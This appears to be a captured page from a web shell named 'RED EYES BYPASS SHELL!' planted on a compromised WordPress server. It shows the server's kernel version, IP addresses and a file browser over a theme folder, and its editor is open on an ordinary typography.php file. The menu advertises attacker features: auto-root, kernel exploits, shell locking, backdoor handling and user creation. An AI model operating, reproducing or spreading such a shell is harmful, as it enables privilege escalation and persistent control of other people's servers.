Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
inc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
customizer
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
class-bnm-meta-boxes.php
4.94
KB
-rwxr-xr-x
class-bnm-nav-walker.php
5.18
KB
-rwxr-xr-x
class-bnm-svg-icons.php
45.14
KB
-rwxr-xr-x
css-output.php
19.86
KB
-rwxr-xr-x
custom-header.php
2.71
KB
-rwxr-xr-x
template-functions.php
15.29
KB
-rwxr-xr-x
template-tags.php
13.13
KB
-rwxr-xr-x
typography.php
4.56
KB
-rwxr-xr-x
wptt-webfont-loader.php
17.35
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : typography.php
<?php /** * BNM: Typography functions. * * @package BNM */ function bnm_custom_typography_css() { $body_font = get_theme_mod( 'bnm_font_family_1', '' ); $headings_font = get_theme_mod( 'bnm_font_family_2', '' ); $headings_font_weight = get_theme_mod( 'bnm_headings_font_weight', '' ); $site_title_desktop_font_size = get_theme_mod( 'bnm_site_title_desktop_font_size', '' ); $site_title_tablet_font_size = get_theme_mod( 'bnm_site_title_tablet_font_size', '' ); $site_title_mobile_font_size = get_theme_mod( 'bnm_site_title_mobile_font_size', '' ); $post_desktop_font_size = get_theme_mod( 'bnm_post_desktop_font_size', '' ); $post_tablet_font_size = get_theme_mod( 'bnm_post_tablet_font_size', '' ); $post_mobile_font_size = get_theme_mod( 'bnm_post_mobile_font_size', '' ); $css = ''; $block_editor_css = ''; if ( $body_font ) { $css .= ' :root { --bnm-font-family-body: ' . wp_kses( $body_font, null ) . '; } '; $block_editor_css .= ' :root .editor-styles-wrapper { --bnm-font-family-body: ' . wp_kses( $body_font, null ) . '; } '; } if ( $headings_font ) { $css .= ' :root { --bnm-font-family-headings: ' . wp_kses( $headings_font, null ) . '; } '; $block_editor_css .= ' :root .editor-styles-wrapper { --bnm-font-family-headings: ' . wp_kses( $headings_font, null ) . '; } '; } if ( $headings_font_weight ) { $css .= ' :root { --bnm-font-weight-headings: ' . esc_attr( $headings_font_weight ) . '; } '; $block_editor_css .= ' :root .editor-styles-wrapper { --bnm-font-weight-headings: ' . esc_attr( $headings_font_weight ) . '; } '; } // Site title font size. if ( $site_title_desktop_font_size ) { $css .= ' .site-title { font-size: ' . esc_attr( $site_title_desktop_font_size ) . '; } '; } if ( $site_title_tablet_font_size ) { $css .= ' @media screen and (max-width: 768px) { .site-title { font-size: ' . esc_attr( $site_title_tablet_font_size ) . '; } } '; } if ( $site_title_mobile_font_size ) { $css .= ' @media screen and (max-width: 600px) { .site-title { font-size: ' . esc_attr( $site_title_mobile_font_size ) . '; } } '; } // Post font size. if ( $post_desktop_font_size ) { $css .= ' .single .bnm-entry { font-size: ' . esc_attr( $post_desktop_font_size ) . '; } '; $block_editor_css .= ' .wp-block-post-content { font-size: ' . esc_attr( $post_desktop_font_size ) . '; } '; } if ( $post_tablet_font_size ) { $css .= ' @media screen and (max-width: 768px) { .single .bnm-entry { font-size: ' . esc_attr( $post_tablet_font_size ) . '; } } '; $block_editor_css .= ' @media screen and (max-width: 768px) { .wp-block-post-content { font-size: ' . esc_attr( $post_desktop_font_size ) . '; } } '; } if ( $post_mobile_font_size ) { $css .= ' @media screen and (max-width: 600px) { .single .bnm-entry { font-size: ' . esc_attr( $post_mobile_font_size ) . '; } } '; $block_editor_css .= ' @media screen and (max-width: 600px) { .wp-block-post-content { font-size: ' . esc_attr( $post_desktop_font_size ) . '; } } '; } if ( '' !== $css ) { $theme_css = $css; } else { $theme_css = ''; } if ( '' !== $block_editor_css ) { $editor_css = $block_editor_css; } else { $editor_css = ''; } if ( function_exists( 'register_block_type' ) && is_admin() ) { $theme_css = $editor_css; } return $theme_css; }
Close